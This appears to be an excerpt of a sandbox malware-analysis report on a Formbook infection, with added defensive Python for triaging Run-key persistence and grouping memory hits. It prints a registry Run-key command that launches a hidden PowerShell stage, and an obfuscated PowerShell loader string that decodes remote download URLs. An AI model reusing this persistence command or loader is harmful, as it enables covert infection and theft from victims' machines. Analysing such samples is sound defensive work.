              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2E80 NtReadVirtualMemory,26_2_21CC2E80
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2EA0 NtAdjustPrivilegesToken,26_2_21CC2EA0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2E30 NtWriteVirtualMemory,26_2_21CC2E30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD9B70BE92
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD9B70B0E6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD9B706E6D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0468EF68
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0468F838
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0468EC20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0747C998
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_23D7B5C1
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_23D87194
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_0044B040
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_0043610D
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_00447310
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_0044A490
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_0040755A
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_0043C560
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_0044B610
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_0044D6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_004476F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_0044B870
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_0044081D
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_00414957
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_004079EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_00407AEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_0044AA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_00412AA9
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_00404B74
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_00404B03
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_0044BBD8
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_00404BE5
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_00404C76
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_00415CFE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_00416D72
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_00446D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_00446D8B
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_00406E8F
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_00405038
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_0041208C
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_004050A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_0040511A
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_0043C13A
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_004051AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_00449300
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_0040D322
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_0044A4F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_0043A5AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_00413631
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_00446690
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_0044A730
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_004398D8
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_004498E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_0044A886
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_0043DA09
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_00438D5E
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_00449ED0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_0041FE83
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_00430F54
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_004050C2
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_004014AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_00405133
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_004051A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_00401246
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_0040CA46
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_00405235
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_004032C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_00401689
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_00402F60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 20_2_0482F488
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 20_2_0482F140
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D481CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C9B1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D501AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D18158
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC516C
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D5B16B
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C80100
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D2A118
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D3F0CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D4F0E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D470E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D503E6
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C9E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CD739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C7D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D4132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CAB2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C952A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D30274
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D50591
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D2D5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D47571
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C90535
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D3E4F6
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D42446
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C81460
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D4F43F
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C817EC
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D4F7B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CB4750
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C90770
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D416CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CAC6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C95990
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C929A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D5A9A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C99950
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CAB950
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CA6962
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C938E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CBE8F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C768B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C92840
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C9A840
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CFD800
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D46BD7
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D05BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CCDBF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D4AB40
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D3DAC6
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C8EA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CD5AA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D2DAAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D47A46
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D4FA49
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D03A6C
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CAFDC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C8ADE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CA8DBF
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D41D5A
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D47D73
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C9AD00
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D4FCF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C80CF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D30CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C9EC60
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C82FC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C91F92
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D4FFB1
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D0EFA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D04F40
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D4FF09
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CD2F28
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CB0F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D4EEDB
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D4CE93
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CA2E90
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C99EB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21C90E5B
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21D4EE26
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 21CD7E54 appears 88 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 004169A7 appears 87 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 21C7B970 appears 220 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 0044DB70 appears 41 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 004165FF appears 35 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 21CC5130 appears 34 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 21CFEA12 appears 81 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 00422297 appears 42 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 21D0F290 appears 98 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 00444B5A appears 37 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 00413025 appears 79 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 00416760 appears 69 times
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"
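The Run-key value above is the persistence half of the chain and has three traits worth hunting for on their own: the launcher is an environment variable (%outoven%) rather than a literal path, so a REG_EXPAND_SZ value is needed to get it expanded at logon; the window is hidden (-w 1); and the next stage is not a file at all but a registry value (HKCU\Neglective\Tveboplantes) that is read back with Get-ItemProperty and handed to a second invocation of the same expanded launcher. The check below is an added example, not part of the Joe Sandbox report: it parses constructed `reg query` output in which only the Almindeligheden value mirrors the report, flags those three traits, and shows what the value expands to. The report does not show what %outoven% holds, so the environment mapping used for the expansion is an assumption; on a live host it would be read from HKCU\Environment and the Session Manager environment key instead.

```python
"""Triage of HKCU Run-key values for the launcher pattern in the REG ADD line above.

Added example, not part of the Joe Sandbox report. SAMPLE_REG_QUERY is constructed
to look like `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` output;
only the Almindeligheden value mirrors the report. The page does not show what
%outoven% holds, so ASSUMED_ENV is an assumption.
"""
import re

# Variables a benign REG_EXPAND_SZ launcher normally uses; anything else is worth a look.
STANDARD_VARS = {
    "systemroot", "windir", "programfiles", "programfiles(x86)", "programdata",
    "localappdata", "appdata", "userprofile", "systemdrive", "public", "temp", "tmp",
}

VALUE_RE = re.compile(r"^\s*(?P<name>\S+)\s+(?P<type>REG_\w+)\s+(?P<data>.*)$")
VAR_RE = re.compile(r"%([^%]+)%")

SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive           REG_SZ           "C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Almindeligheden    REG_EXPAND_SZ    %outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)
"""
# Assumption: the report never shows the value of %outoven%; a PowerShell path fits the rest of the value.
ASSUMED_ENV = {"outoven": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"}


def parse_reg_query(text):
    """Value lines of `reg query` output as (name, type, data); key-path lines carry no REG_ type and are skipped."""
    return [(m["name"], m["type"], m["data"].strip())
            for m in map(VALUE_RE.match, text.splitlines()) if m]


def expand(data, env):
    """Expand %var% references the way a REG_EXPAND_SZ value is expanded at logon (case-insensitive)."""
    lower = {k.lower(): v for k, v in env.items()}
    return VAR_RE.sub(lambda m: lower.get(m.group(1).lower(), m.group(0)), data)


def triage_value(name, vtype, data, env):
    """Return the value with the list of indicators it tripped (empty for a clean entry)."""
    reasons = []
    head = VAR_RE.match(data)  # value starts with %var% instead of a literal path
    if vtype == "REG_EXPAND_SZ" and head and head.group(1).lower() not in STANDARD_VARS:
        reasons.append(f"launcher hidden behind non-standard variable %{head.group(1)}%")
    expanded = expand(data, env)
    if (re.search(r"powershell(\.exe)?\b", expanded, re.I)
            and re.search(r"-w(indowstyle)?\s+(1|hidden)\b", expanded, re.I)):
        reasons.append("PowerShell with hidden window")
    if re.search(r"Get-ItemProperty\s+-Path\s+'?HKCU:", expanded, re.I):
        reasons.append("next stage read from a registry value under HKCU, not from a file")
    return {"name": name, "type": vtype, "expanded": expanded, "reasons": reasons}


def triage_run_values(text, env):
    """Only the values that tripped at least one indicator."""
    return [r for r in (triage_value(*v, env) for v in parse_reg_query(text)) if r["reasons"]]


if __name__ == "__main__":
    for hit in triage_run_values(SAMPLE_REG_QUERY, ASSUMED_ENV):
        print(hit["name"], "->", hit["expanded"])
        for why in hit["reasons"]:
            print("   ", why)
```

The expansion step matters: a signature that looks for "powershell" in the raw Run value misses this entry, because the string "powershell" is not in it. The same applies to any tool that reads the value without expanding it.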
Source: amsi32_7860.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_8084.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 0000001E.00000002.4222881972.0000000003F90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001A.00000002.2858446917.00000000229A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001A.00000002.2858446917.00000000233A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001E.00000002.4222881972.0000000003590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 7616, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7860, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
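The nine Formbook matches above are spread over four process indices and say more once grouped: the index in the first field of a dump name is the same N that prefixes the "N_2_..." function ids (0x1A = 26 is the wab.exe process whose hand-built Nt* call table is listed further up, and 0x0A = 10 pairs with the "10_2_" functions of the other wab.exe instance), and the fifth field only ever holds 0x40 or 0x04 here, which are the Windows PAGE_EXECUTE_READWRITE and PAGE_READWRITE values. The helper below is an added example, not part of the Joe Sandbox report: it parses the dump names copied from the matches above under that inferred layout (the remaining fields are kept raw because the page does not explain them) and reports, per process, how many hits sit in writable and executable memory, which is where an unpacked payload normally lives.

```python
"""Group the Formbook Yara hits above by process index and memory protection.

Added example, not part of the Joe Sandbox report. FORMBOOK_DUMPS copies the dump
names from the matches above. The field layout is inferred from the report, not
documented: field 0 is the process index (0x1A = 26, the prefix of the wab.exe
"26_2_..." function ids), field 3 the region base address, field 4 a protection
value that here is always 0x40 or 0x04 (PAGE_EXECUTE_READWRITE / PAGE_READWRITE).
The other fields are kept raw because their meaning is not shown on the page.
"""
from collections import defaultdict

FORMBOOK_DUMPS = [
    "0000001E.00000002.4222881972.0000000003F90000.00000040.00000001.00040000.00000000.sdmp",
    "00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp",
    "0000001A.00000002.2858446917.00000000229A0000.00000040.10000000.00040000.00000000.sdmp",
    "0000001A.00000002.2858446917.00000000233A0000.00000040.10000000.00040000.00000000.sdmp",
    "0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp",
    "00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp",
    "00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp",
    "00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp",
    "0000001E.00000002.4222881972.0000000003590000.00000040.00000001.00040000.00000000.sdmp",
]

# Windows memory protection constants from winnt.h; assumed to be what field 4 encodes.
PAGE_PROTECT = {
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
}


def parse_dump_name(name):
    """Split a .sdmp name into the fields used here (layout assumed, see module docstring)."""
    stem = name[:-len(".sdmp")] if name.endswith(".sdmp") else name
    fields = stem.split(".")
    if len(fields) != 8:
        raise ValueError(f"unexpected dump name: {name}")
    prot = int(fields[4], 16)
    return {
        "process": int(fields[0], 16),  # the N in the report's "N_2_..." function ids
        "base": int(fields[3], 16),
        "protect": PAGE_PROTECT.get(prot, hex(prot)),
        "raw": fields,
    }


def hits_by_process(names):
    """Map process index -> parsed hits, each list sorted by base address."""
    grouped = defaultdict(list)
    for name in names:
        d = parse_dump_name(name)
        grouped[d["process"]].append(d)
    return {p: sorted(v, key=lambda d: d["base"]) for p, v in grouped.items()}


def executable_regions(names):
    """Hits that sit in writable+executable memory, the usual home of unpacked code."""
    return [d for d in map(parse_dump_name, names) if d["protect"] == "PAGE_EXECUTE_READWRITE"]


if __name__ == "__main__":
    for proc, hits in sorted(hits_by_process(FORMBOOK_DUMPS).items()):
        regions = ", ".join(f"0x{d['base']:X} ({d['protect']})" for d in hits)
        print(f"process {proc}: {len(hits)} Formbook hit(s) at {regions}")
```

For process 26 all three hits are in RWX regions, none of which is in the address range of the Nt* stubs listed above (0x21CC2xxx), so the call table and the payload occupy separate allocations in the same wab.exe process.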
Source: wab.exe, 0000000A.00000002.4231459057.000000000A087000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exer='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = 